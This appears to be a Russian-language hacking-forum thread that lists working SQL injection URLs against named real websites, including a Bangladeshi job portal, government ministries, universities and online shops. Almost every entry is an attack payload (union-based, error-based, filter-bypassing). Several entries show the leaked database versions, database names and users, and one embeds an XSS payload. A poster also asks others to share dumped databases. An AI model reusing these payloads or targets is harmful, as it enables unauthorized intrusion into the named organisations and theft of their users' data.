Ресурс позиционирует себя как крупнейший сайт по поиску работы в Бангладеш, траф соответствует. Microsoft SQL Server 2012 - 11.0.7462.6 Code: http://bdjobs.com/jobfair/ComFairWithJob_print.asp?Att_Id=2981 and 1=@@version -- &Fair_Id=5713 Code: http://bdjobs.com/jobfair/ComFairWithJob_print.asp?Att_Id=2981 and 1=(select db_name(1)) -- &Fair_Id=5713 Code: http://bdjobs.com/jobfair/ComFairWithJob_print.asp?Att_Id=2981 and 1=(select top 1 name from master..sysobjects where name not in ('sp_MSalreadyhavegeneration','sp_MSwritemergeperfcounter')) -- &Fair_Id=5713 Ну и чуть-чуть для разнообразия PostgreSQL 9.4.24 SIXSS (пофиксили ) Code: http://www.acb.com/menu.php?id=-7253 union select 1,(chr(60)||chr(47)||chr(100)||chr(105)||chr(118)||chr(62)||chr(60)||chr(115)||chr(99)||chr(114)||chr(105)||chr(112)||chr(116)||chr(62)||chr(97)||chr(108)||chr(101)||chr(114)||chr(116)||chr(40)||chr(41)||chr(60)||chr(47)||chr(115)||chr(99)||chr(114)||chr(105)||chr(112)||chr(116)||chr(62)||concat_ws(chr(32)||chr(35)||chr(32),session_user,version(),array_to_string(array(select DISTINCT schemaname from pg_catalog.pg_tables),','),array_to_string(array(select tablename from pg_catalog.pg_tables where schemaname='pg_catalog'),','),array_to_string(array(select attname from pg_catalog.pg_attribute where attrelid=(select oid from pg_catalog.pg_class where relname='pg_class') AND attnum>0),','))) --%20 Sqlite 3.7.17 Code: webdocs.cs.ualberta.ca/~hwsamuel/cardea/helix/catalog.php?id=4 union select 1,(sqlite_version())||char(35,35,35,35,35)||group_concat(tbl_name),3,group_concat(sql),5,6,(select group_concat(path) from document)||char(35,35,35,35,35)||(select group_concat(url) from document),8,9 from sqlite_master --%20 Sqlite 3.3.7 Code: www.newvideos.x0.com/channel/play.php?file_id=274' union select 1,2,(select sql from sqlite_master where type='table' limit 1,1),sqlite_version(),(select sql from sqlite_master where type='table' limit 0,1),6,7,8 from sqlite_master --%20
Code: http://www.horus.com.eg/newdetails.php?Id=-89+union+select+1,2,concat_ws(0x3a,version(),user(),database()),4,5,6--
Поддомен sourceforge Code: http://leaf.sourceforge.net/index.php?PAGE_user_op=view_page&PAGE_id=5&MMN_position=20:20&module=-111' or (select count(*) from (select 1 union select 2 union select 3)x group by concat(mid(version(), 1, 63), floor(rand(0)*2))) --%20 Code: http://leaf.sourceforge.net/index.php?PAGE_user_op=view_page&PAGE_id=5&MMN_position=20:20&module=-111' or (select count(*) from (select 1 union select 2 union select 3)x group by concat(mid((select schema_name from information_schema.schemata limit 1,1), 1, 63), floor(rand(0)*2))) --%20
Make It Yours или привет от кулер_мастер Будь внимателен Code: https://makerhub.coolermaster.com/custom-lighting/download.php?id=-177 union select 1,2,3,4,5,6,(select schema_name from information_schema.schemata limit 0,1),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23 --%20
Code: http://www.comwave.edu.pk/download.php?id=-131+union+select+concat_ws(0x3a,version(),user(),database()),2,3--
Sri Lanka Ministry of Highways & Road Development Code: https://mohsl.gov.lk/en/projects.php?project=-1+union+select+1,2,3,4--&type=0&view_project=View%20Project Sri Lanka, University of Ruhuna Code: http://www.sci.ruh.ac.lk/botany/academic_staff_profile.php?id=-893+union+select+1,2,3,4,5,6,7,8,9,10,11--
Code: https://www.amaluxuryshower.it/eng/scheda-news.php?ID=-7+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,concat_ws(0x3a,version(),database(),user()),20,21,22,23,24,25-- Centro Convegni Sant’Agostino Code: http://www.cortonasviluppo.it/dettaglio-news.php?id=-228+union+select+1,2,3,concat_ws(0x3a,version(),database(),user()),5,6,7,8,9,10,11,12,13-- USA Indian Diaspora Council Code: http://www.indiandiasporacouncil.org/news.php?id=-86+union+select+1,2,3,concat_ws(0x3a,version(),database(),user()),5,6-- Code: https://www.trmh.com/news.php?id=-75+union+select+1,version(),3,4,5--
Индийской шоп деревянных игрушек Code: https://gooutofbox.com/category-list.php?id=-82 union select 1,concat(user(),0x3a,version(),0x3a,database())-- - Code: https://www.renzglobal.com/eshop/product-details.php?id=-56' union select 1,2,concat(user(),0x3a,version(),0x3a,database()),4,5,6,7,8,9,10,11,12,13,14,15-- - Индийский шоп. 15к трафа Code: https://www.corporategiftsbangalore.com/details.php?id=426' /*!50000union*/ /*!50000select*/ 1,2,/*!50000concat(user(),0x3a,version(),0x3a,database())*/,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19-- - Снова индийский шоп Code: https://www.print2shop.com/product-details.php?id=-75' /*!50000union*/ /*!50000select*/ 1,2,/*!50000concat(user(),0x3a,version(),0x3a,database())*/,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19-- -&&idd=T-SHIRT WHITE POLYESTER Ну и последний на сегодня. Сервис принта на футболках. Страну угадайте сами
Code: http://www.gibas.ro/news.php?view=news&id=-46+union+select+1,version(),3,4,5,6,7,8--&language=en Bahauddin Zakariya University, Multan, Pakistan. Code: https://www.bzu.edu.pk/news.php?cid=-5+union+select+1,version(),database(),4,5,6,7--
Чилийская адвокатская контора: Code: http://www.menayguijon.cl/detalle_b.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,concat_ws(0x3a,database(),user(),version()),16,17--
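В линке начали фильтровать union, то есть, судя по всему, поставили фильтр по ключевому слову вместо параметризованного запроса, так что сама инъекция осталась. Теперь работает так. Code: http://www.fc-utd.co.uk/report.php?match_id=-1901/*!50000union*/%20/*!50000SeLeCt*/%20/*!50000version()*/%20--#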
Code: https://www.carmona.org/actualidad/publicacion.php?pub=-8a5c161549d42e54e0ef1c2bf8d03cf0%27+/*!12345uNIoN*/+/*!12345sELecT*/+1,table_name,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39+from+information_schema.tables+WHERE+table_schema=database()+limit+24,1+--+
Экономическая игра с выводом денег. Code: https://golden-oligarch.biz/1'or(ExtractValue(1,concat(0x3a,(user()))))--' https://golden-oligarch.biz/1'or(1,2)=(select*from(select(name_const(version(),1)),name_const(version(),1))a)and(1)='1/ https://golden-oligarch.biz/1'or(ExtractValue(1,concat(0x3a,(SELECT/**/TABLE_NAME/**/FROM/**/information_schema.TABLES/**/LIMIT/**/40,1),(':'))))--' https://golden-oligarch.biz/1'or(ExtractValue(1,concat(0x3a,(database()))))--' з.ы. сольете поделитесь базой, если не жалко. Мап не льет, по другому лень.
Code: http://www.elcor.ma/fiche_actualite.php?id=-77+union+select+1,concat_ws(0x3a,database(),user(),version()),3,4,5,6,7,8--
Code: http://mapexpert.com.ua/index_ru.php?id=-20+union+select+1,2,database(),4,version(),6,7,8,9,10,11--&table=news Группа «MapExpert» была создана в 2008 году с целью популяризации дистанционного зондирования Земли (ДЗЗ) и географических информационных систем (ГИС) и их технологий на территории стран СНГ.
Code: http://heda.cndp.fr/gothique.php?projet=1¬ice=46+AND+extractvalue(1,concat(0x3a,(select+user())))--
Code: https://www.ascent-gt.com/news-full.php?id=-1+/*!12345union*/+select+1,user(),version(),database(),5,6 [email protected] 5.6.41-84.1 dailynf1_daily
Code: http://ubise-officepro.com/fr/produit.php?id=-142+union+select+1,2,3,4,concat_ws(0x23,version(),database(),user()),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27--+- 5.6.50-log ubiseoffbhoffice [email protected] Code: http://www.landcraft-projects.co.uk/newsitem.php?pageid=-2%27+/*!12345union*/+select+1,concat_ws(0x23,version(),database(),user()),3,4,5,6,7,8,9,10--+- 5.7.36-log db471655925 [email protected] Code: https://upm.dipanegara.ac.id/page.php?id=-14+union+select+1,2,concat_ws(0x23,version(),database(),user())--+- 5.7.36 admin_upm admin_root@localhost
Code: https://mhms.gov.ki/category.php?id=-10%27+union+select+1,concat_ws(0x23,version(),database(),user())--+- 10.1.48-MariaDB blog_admin_db root@localhost
Code: https://itra.digitalindiacorporation.in/MIS/admin/profile_view.php?p_name=Gaurav%20Sharma%27+union+select+1,2,concat_ws(0x23,version(),database(),user()),4,5,6,7,8,9,10,11,12,13,14,15,16--+- 5.7.33-0ubuntu0.16.04.1 itra_mis gaurav@localhost Code: http://www.crumbweb.org/newsdetail.php?sublink=1&id=-112+union+select+1,2,concat_ws(0x23,version(),database(),user()),4,5,6,7--+- 5.6.49-89.0-56 crumbweb_crumb2coredatabase [email protected] Code: http://acme-et.com/category.php?id=-16+/*!12345union*/+select+1,concat_ws(0x23,version(),database(),user()),3,4,5--+- 5.6.41-84.1 acmeet_acme [email protected]